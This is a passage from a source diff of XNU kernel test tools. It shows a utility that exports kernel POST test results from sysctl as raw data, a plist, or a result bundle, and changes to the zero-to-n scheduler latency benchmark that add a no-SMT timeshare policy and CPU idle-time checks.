kRBInfoKeyBootargs = @"boot-args"; +NSString * const kRBInfoKeyOSVersion = @"osVersion"; +NSString * const kRBInfoKeyResultCode = @"result_code"; +NSString * const kRBInfoKeyResultStarted = @"result_started"; +NSString * const kRBInfoKeyResultFinished = @"result_finished"; +NSString * const kRBInfoKeyMachTBInfo = @"mach_timebase_info"; +NSString * const kRBInfoKeyMachTBInfoDenom = @"denom"; +NSString * const kRBInfoKeyMachTBInfoNumer = @"numer"; +NSString * const kRBInfoKeyBeginTimeRaw = @"beginTimeRaw"; +NSString * const kRBInfoKeyEndTimeRaw = @"endTimeRaw"; + +NSNumber * const kResultBundleVersion = @2; +NSString * const kResultBundleCategory = @"unittest"; +NSString * const kResultBundleProject = @"xnu"; +NSNumber * const kResultCodePass = @200; +NSNumber * const kResultCodeFail = @400; + +#define COMMAND_EXPORT (0) +static int g_command = COMMAND_EXPORT; +#define OUTPUT_FORMAT_RAW (0) +#define OUTPUT_FORMAT_PLIST_XML (1) +#define OUTPUT_FORMAT_RESULTBUNDLE (2) +static int g_output_format = OUTPUT_FORMAT_RAW; +static char * g_output_dir = NULL; + +static void +usage(void) +{ + const char * progname = getprogname(); + fprintf(stderr, + "Usage:\t%s COMMAND [OPTIONS]\n\n" + "\t%s export -o OUTPUT_DIR_PATH [-f raw|plist|resultbundle]\n" + "\nSupported command:\n" + "\texport\n", + progname, progname); +} + +static void +parse_export_options(int argc, char * argv[]) +{ + int ch; + bool error = false; + + while ((ch = getopt(argc, argv, "o:f:")) != -1) { + switch (ch) { + case 'o': + g_output_dir = optarg; + break; + case 'f': + if (strncmp(optarg, "raw", 4) == 0) { + g_output_format = OUTPUT_FORMAT_RAW; + } else if (strncmp(optarg, "plist", 6) == 0) { + g_output_format = OUTPUT_FORMAT_PLIST_XML; + } else if (strncmp(optarg, "resultbundle", 13) == 0) { + g_output_format = OUTPUT_FORMAT_RESULTBUNDLE; + } else { + error = true; + } + break; + default: + error = true; + break; + } + } + + if (g_output_dir == NULL) { + error = true; + } + + struct stat path_stat; + if (stat(g_output_dir, &path_stat)) { + PERR("Failed to access output dir"); + error = true; + } else if (!S_ISDIR(path_stat.st_mode)) { + ERR("error: Output path must be a directory"); + error = true; + } + + if (error) { + usage(); + exit(EX_USAGE); + } +} + +static void +parse_options(int argc, char * argv[]) +{ + if (argc > 1) { + char * cmd = argv[1]; + argc--; + argv++; + if (strncmp(cmd, "export", 7) == 0) { + g_command = COMMAND_EXPORT; + parse_export_options(argc, argv); + } else { + usage(); + exit(EX_USAGE); + } + } else { + usage(); + exit(EX_USAGE); + } +} + +static void +retrieve_test_data(void ** raw_buf_p, size_t * raw_size_p) +{ + int rc = sysctlbyname("debug.xnupost_get_tests", NULL, raw_size_p, NULL, 0); + if (rc == 0 && *raw_size_p > 0) { + *raw_buf_p = malloc(*raw_size_p); + if (*raw_buf_p) { + rc = sysctlbyname("debug.xnupost_get_tests", *raw_buf_p, raw_size_p, NULL, 0); + if (0 != rc) { + PERR("Failed to get KCData through sysctl"); + } + } else { + PERR("Failed to allocate KCData raw buffer"); + } + } else { + PERR("Failed to get size through sysctl"); + } +} + +static void +export_raw(void * raw_buf, size_t raw_size) +{ + if (raw_buf) { + char output_path[MAXPATHLEN]; + snprintf(output_path, MAXPATHLEN, "%s/xnupost.kcdata", g_output_dir); + FILE * output_fp = fopen(output_path, "w"); + if (output_fp) { + fwrite(raw_buf, raw_size, 1, output_fp); + fclose(output_fp); + } else { + PERR("Failed to open output path"); + } + } +} + +static void +export_to_plist(void * raw_buf, size_t raw_size) +{ + if (raw_buf) { + char output_path[MAXPATHLEN]; + snprintf(output_path, MAXPATHLEN, "%s/xnupost.plist", g_output_dir); + NSError * nsError = nil; + NSDictionary * parsed_dict = parseKCDataBuffer(raw_buf, raw_size, &nsError); + if (parsed_dict) { + NSData * plist_data = [NSPropertyListSerialization dataWithPropertyList:parsed_dict + format:NSPropertyListXMLFormat_v1_0 + options:0 + error:&nsError]; + if (plist_data) { + if (![plist_data writeToFile:[NSString stringWithUTF8String:output_path] atomically:YES]) { + ERR("Failed to write plist to %s", output_path); + } + } else { + ERR("Failed to serialize result plist: %s", nsError.localizedDescription.UTF8String); + } + } else { + ERR("Failed to parse KCData to plist: %s", nsError.localizedDescription.UTF8String); + } + } +} + +#define RESULTBUNDLE_TIME_STR_SIZE (30) // 0000-00-00T00:00:00.000+00:00'\0' +#define RESULTBUNLDE_TIME_MS_INDEX (20) +#define RESULTBUNLDE_TIME_TZ_COLON_INDEX (26) +#define RESULTBUNDLE_TIME_MS_STR_SIZE (4) // 000'\0' +#define MSEC_PER_USEC 1000ull + +static void +get_estimated_time_str_resultbundle(char * output_str, uint64_t mach_abs_time_usec) +{ + uint64_t est_usec = mach_boottime_usec() + mach_abs_time_usec; + time_t est_sec = (time_t)(est_usec / USEC_PER_SEC); + uint64_t est_usec_fraction = est_usec % USEC_PER_SEC; + struct tm tm_info; + int i = 0; + + localtime_r(&est_sec, &tm_info); + strftime(output_str, RESULTBUNDLE_TIME_STR_SIZE, "%Y-%m-%dT%H:%M:%S.000%z", &tm_info); + + /* Fill out milliseconds */ + char ms_str[RESULTBUNDLE_TIME_MS_STR_SIZE] = {0}; + snprintf(ms_str, RESULTBUNDLE_TIME_MS_STR_SIZE, "%03llu", est_usec_fraction / MSEC_PER_USEC); + for (i = 0; i < 3; i++) { + output_str[RESULTBUNLDE_TIME_MS_INDEX + i] = ms_str[i]; + } + + /* Add colon for timezone offset */ + for (i = RESULTBUNDLE_TIME_STR_SIZE - 1; i > RESULTBUNLDE_TIME_TZ_COLON_INDEX; i--) { + output_str[i] = output_str[i - 1]; + } + output_str[RESULTBUNLDE_TIME_TZ_COLON_INDEX] = ':'; +} + +static void +create_subtest_bundle_config(NSDictionary * testconfig, NSDictionary * subtest, char * bundle_dir) +{ + NSString * testName = subtest[kXNUPostKCDataKeyTestName]; + NSNumber * tbInfoDenom = testconfig[kXNUPostKCDataKeyMachTBInfo][kXNUPostKCDataKeyMachTBInfoDenom]; + NSNumber * tbInfoNumer = testconfig[kXNUPostKCDataKeyMachTBInfo][kXNUPostKCDataKeyMachTBInfoNumer]; + struct mach_timebase_info tb_info; + tb_info.denom = tbInfoDenom.unsignedIntValue; + tb_info.numer = tbInfoNumer.unsignedIntValue; + NSNumber * beginTimeRaw = subtest[kXNUPostKCDataKeyBeginTime]; + NSNumber * endTimeRaw = subtest[kXNUPostKCDataKeyEndTime]; + uint64_t begin_time_usec = (beginTimeRaw.unsignedLongLongValue * tb_info.numer) / (tb_info.denom * NSEC_PER_USEC); + uint64_t end_time_usec = (endTimeRaw.unsignedLongLongValue * tb_info.numer) / (tb_info.denom * NSEC_PER_USEC); + bool test_status = + subtest[kXNUPostKCDataKeyRetval] && (subtest[kXNUPostKCDataKeyRetval] == subtest[kXNUPostKCDataKeyExpectedRetval]); + + char output_path[MAXPATHLEN]; + char * output_dir_end = NULL; + + snprintf(output_path, MAXPATHLEN, "%s/test_%s", bundle_dir, testName.UTF8String); + if (mkdir(output_path, 0777)) { + PERR("Failed to create subtest bundle dir"); + } + output_dir_end = output_path + strlen(output_path); + + *output_dir_end = '\0'; + strlcat(output_path, "/Attachments", MAXPATHLEN); + if (mkdir(output_path, 0777)) { + PERR("Failed to create subtest Attachments dir"); + } + + *output_dir_end = '\0'; + strlcat(output_path, "/Diagnostics", MAXPATHLEN); + if (mkdir(output_path, 0777)) { + PERR("Failed to create subtest Diagnostics dir"); + } + + NSMutableDictionary * rbInfo = [NSMutableDictionary new]; + rbInfo[kRBInfoKeyVersion] = kResultBundleVersion; + rbInfo[kRBInfoKeyCategory] = kResultBundleCategory; + rbInfo[kRBInfoKeyTestID] = testName; + rbInfo[kRBInfoKeyProject] = kResultBundleProject; + rbInfo[kRBInfoKeyOSVersion] = testconfig[kXNUPostKCDataKeyOSVersion]; + rbInfo[kRBInfoKeyBootargs] = testconfig[kXNUPostKCDataKeyBootargs]; + rbInfo[kRBInfoKeyResultCode] = test_status ? kResultCodePass : kResultCodeFail; + + char estimated_time_str[RESULTBUNDLE_TIME_STR_SIZE]; + get_estimated_time_str_resultbundle(estimated_time_str, begin_time_usec); + rbInfo[kRBInfoKeyResultStarted] = [NSString stringWithUTF8String:estimated_time_str]; + get_estimated_time_str_resultbundle(estimated_time_str, end_time_usec); + rbInfo[kRBInfoKeyResultFinished] = [NSString stringWithUTF8String:estimated_time_str]; + + rbInfo[kRBInfoKeyMachTBInfo] = @{kRBInfoKeyMachTBInfoDenom : tbInfoDenom, kRBInfoKeyMachTBInfoNumer : tbInfoNumer}; + + rbInfo[kRBInfoKeyBeginTimeRaw] = beginTimeRaw; + rbInfo[kRBInfoKeyEndTimeRaw] = endTimeRaw; + + *output_dir_end = '\0'; + strlcat(output_path, "/Info.plist", MAXPATHLEN); + NSURL * output_url = [NSURL fileURLWithFileSystemRepresentation:output_path isDirectory:NO relativeToURL:nil]; + NSError * writeError = nil; + if (![rbInfo writeToURL:output_url error:&writeError]) { + ERR("Failed to write Info.plist file: %s", writeError.localizedDescription.UTF8String); + } + + *output_dir_end = '\0'; + strlcat(output_path, test_status ? "/PASS.status" : "/FAIL.status", MAXPATHLEN); + int fd = open(output_path, O_CREAT | O_TRUNC | O_WRONLY, 0666); + if (fd == -1) { + PERR("Failed to create subtest status file"); + } else { + close(fd); + } +} + +static void +export_to_resultbundle(void * raw_buf, size_t raw_size) +{ + if (raw_buf) { + NSError * nsError = nil; + NSDictionary * parsed_dict = parseKCDataBuffer(raw_buf, raw_size, &nsError); + if (parsed_dict) { + NSDictionary * testconfig = parsed_dict[kXNUPostKCDataKeyTestConfig]; + NSArray * subtests = testconfig[kXNUPostKCDataKeySubTestConfig]; + + char bundle_dir[MAXPATHLEN]; + snprintf(bundle_dir, MAXPATHLEN, "%s/xnupost", g_output_dir); + if (mkdir(bundle_dir, 0777)) { + PERR("Failed to create result bundle dir"); + } + + for (NSDictionary * subtest in subtests) { + create_subtest_bundle_config(testconfig, subtest, bundle_dir); + } + } else { + ERR("Failed to parse KCData to plist: %s", nsError.localizedDescription.UTF8String); + } + } +} + +static void +execute_export(void) +{ + void * raw_buf = NULL; + size_t raw_size = 0; + retrieve_test_data(&raw_buf, &raw_size); + switch (g_output_format) { + case OUTPUT_FORMAT_PLIST_XML: + export_to_plist(raw_buf, raw_size); + break; + case OUTPUT_FORMAT_RESULTBUNDLE: + export_to_resultbundle(raw_buf, raw_size); + break; + case OUTPUT_FORMAT_RAW: + default: + export_raw(raw_buf, raw_size); + break; + } + + FREE_BUF(raw_buf); +} + +int +main(int argc, char * argv[]) +{ + parse_options(argc, argv); + switch (g_command) { + case COMMAND_EXPORT: + execute_export(); + break; + default: + usage(); + exit(EX_USAGE); + break; + } + + return 0; +} diff --git a/tools/tests/zero-to-n/zero-to-n.c b/tools/tests/zero-to-n/zero-to-n.c index e834ccdd0..f8cccbefa 100644 --- a/tools/tests/zero-to-n/zero-to-n.c +++ b/tools/tests/zero-to-n/zero-to-n.c @@ -38,6 +38,7 @@ #include #include #include +#include #include #include @@ -56,10 +57,11 @@ #include #include +#include #include typedef enum wake_type { WAKE_BROADCAST_ONESEM, WAKE_BROADCAST_PERTHREAD, WAKE_CHAIN, WAKE_HOP } wake_type_t; -typedef enum my_policy_type { MY_POLICY_REALTIME, MY_POLICY_TIMESHARE, MY_POLICY_FIXEDPRI } my_policy_type_t; +typedef enum my_policy_type { MY_POLICY_REALTIME, MY_POLICY_TIMESHARE, MY_POLICY_TIMESHARE_NO_SMT, MY_POLICY_FIXEDPRI } my_policy_type_t; #define mach_assert_zero(error) do { if ((error) != 0) { fprintf(stderr, "[FAIL] error %d (%s) ", (error), mach_error_string(error)); assert(error == 0); } } while (0) #define mach_assert_zero_t(tid, error) do { if ((error) != 0) { fprintf(stderr, "[FAIL] Thread %d error %d (%s) ", (tid), (error), mach_error_string(error)); assert(error == 0); } } while (0) @@ -229,7 +231,7 @@ static void create_churn_threads() { if (g_churn_count == 0) { - g_churn_count = g_numcpus - 1; + g_churn_count = g_test_rt_smt ? g_numcpus : g_numcpus - 1; } errno_t err; @@ -417,6 +419,8 @@ parse_thread_policy(const char *str) { if (strcmp(str, "timeshare") == 0) { return MY_POLICY_TIMESHARE; + } else if (strcmp(str, "timeshare_no_smt") == 0) { + return MY_POLICY_TIMESHARE_NO_SMT; } else if (strcmp(str, "realtime") == 0) { return MY_POLICY_REALTIME; } else if (strcmp(str, "fixed") == 0) { @@ -470,6 +474,9 @@ thread_setup(uint32_t my_id) switch (g_policy) { case MY_POLICY_TIMESHARE: break; + case MY_POLICY_TIMESHARE_NO_SMT: + proc_setthread_no_smt(); + break; case MY_POLICY_REALTIME: /* Hard-coded realtime parameters (similar to what Digi uses) */ pol.period = 100000; @@ -509,6 +516,20 @@ thread_setup(uint32_t my_id) return 0; } +time_value_t +get_thread_runtime(void) +{ + thread_basic_info_data_t info; + mach_msg_type_number_t info_count = THREAD_BASIC_INFO_COUNT; + thread_info(pthread_mach_thread_np(pthread_self()), THREAD_BASIC_INFO, (thread_info_t)&info, &info_count); + + time_value_add(&info.user_time, &info.system_time); + + return info.user_time; +} + +time_value_t worker_threads_total_runtime = {}; + /* * Wait for a wakeup, potentially wake up another of the "0-N" threads, * and notify the main thread when done. @@ -516,6 +537,8 @@ thread_setup(uint32_t my_id) static void* worker_thread(void *arg) { + static os_unfair_lock runtime_lock = OS_UNFAIR_LOCK_INIT; + uint32_t my_id = (uint32_t)(uintptr_t)arg; kern_return_t kr; @@ -736,6 +759,11 @@ worker_thread(void *arg) mach_assert_zero_t(my_id, kr); } + time_value_t runtime = get_thread_runtime(); + os_unfair_lock_lock(&runtime_lock); + time_value_add(&worker_threads_total_runtime, &runtime); + os_unfair_lock_unlock(&runtime_lock); + return 0; } @@ -774,6 +802,29 @@ compute_stats(uint64_t *values, uint64_t count, float *averagep, uint64_t *maxp, *stddevp = _dev; } +typedef struct { + natural_t sys; + natural_t user; + natural_t idle; +} cpu_time_t; + +void +record_cpu_time(cpu_time_t *cpu_time) +{ + host_cpu_load_info_data_t load; + mach_msg_type_number_t count = HOST_CPU_LOAD_INFO_COUNT; + kern_return_t kr = host_statistics(mach_host_self(), HOST_CPU_LOAD_INFO, (int *)&load, &count); + mach_assert_zero_t(0, kr); + + natural_t total_system_time = load.cpu_ticks[CPU_STATE_SYSTEM]; + natural_t total_user_time = load.cpu_ticks[CPU_STATE_USER] + load.cpu_ticks[CPU_STATE_NICE]; + natural_t total_idle_time = load.cpu_ticks[CPU_STATE_IDLE]; + + cpu_time->sys = total_system_time; + cpu_time->user = total_user_time; + cpu_time->idle = total_idle_time; +} + int main(int argc, char **argv) { @@ -787,6 +838,7 @@ main(int argc, char **argv) float avg, stddev; bool test_fail = false; + bool test_warn = false; for (int i = 0; i < argc; i++) { if (strcmp(argv[i], "--switched_apptype") == 0) { @@ -1026,6 +1078,11 @@ main(int argc, char **argv) usleep(g_iteration_sleeptime_us); } + cpu_time_t start_time; + cpu_time_t finish_time; + + record_cpu_time(&start_time); + /* Go! */ for (uint32_t i = 0; i < g_iterations; i++) { uint32_t j; @@ -1100,6 +1157,8 @@ main(int argc, char **argv) } } + record_cpu_time(&finish_time); + /* Rejoin threads */ for (uint32_t i = 0; i < g_numthreads; i++) { ret = pthread_join(threads[i], NULL); @@ -1116,6 +1175,9 @@ main(int argc, char **argv) join_churn_threads(); } + uint32_t cpu_idle_time = (finish_time.idle - start_time.idle) * 10; + uint32_t worker_threads_runtime = worker_threads_total_runtime.seconds * 1000 + worker_threads_total_runtime.microseconds / 1000; + compute_stats(worst_latencies_ns, g_iterations, &avg, &max, &min, &stddev); printf("Results (from a stop):\n"); printf("Max:\t\t%.2f us\n", ((float)max) / 1000.0); @@ -1171,6 +1233,7 @@ main(int argc, char **argv) secondary ? " SECONDARY" : "", fail ? " FAIL" : ""); } + test_warn |= (secondary || fail); test_fail |= fail; fail_count += fail; } @@ -1181,6 +1244,17 @@ main(int argc, char **argv) } } + if (g_test_rt_smt && (g_each_spin_duration_ns >= 200000) && !test_warn) { + printf("cpu_idle_time=%dms worker_threads_runtime=%dms\n", cpu_idle_time, worker_threads_runtime); + if (cpu_idle_time < worker_threads_runtime / 4) { + printf("FAIL cpu_idle_time unexpectedly small\n"); + test_fail = 1; + } else if (cpu_idle_time > worker_threads_runtime * 2) { + printf("FAIL cpu_idle_time unexpectedly large\n"); + test_fail = 1; + } + } + free(threads); free(g_thread_endtimes_abs); free(worst_latencies_ns); @@ -1247,7 +1321,7 @@ static void __attribute__((noreturn)) usage() { errx(EX_USAGE, "Usage: %s " - " \n\t\t" + " \n\t\t" "[--trace ] " "[--verbose] [--spin-one] [--spin-all] [--spin-time ] [--affinity]\n\t\t" "[--no-sleep] [--drop-priority] [--churn-pri ] [--churn-count ]\n\t\t"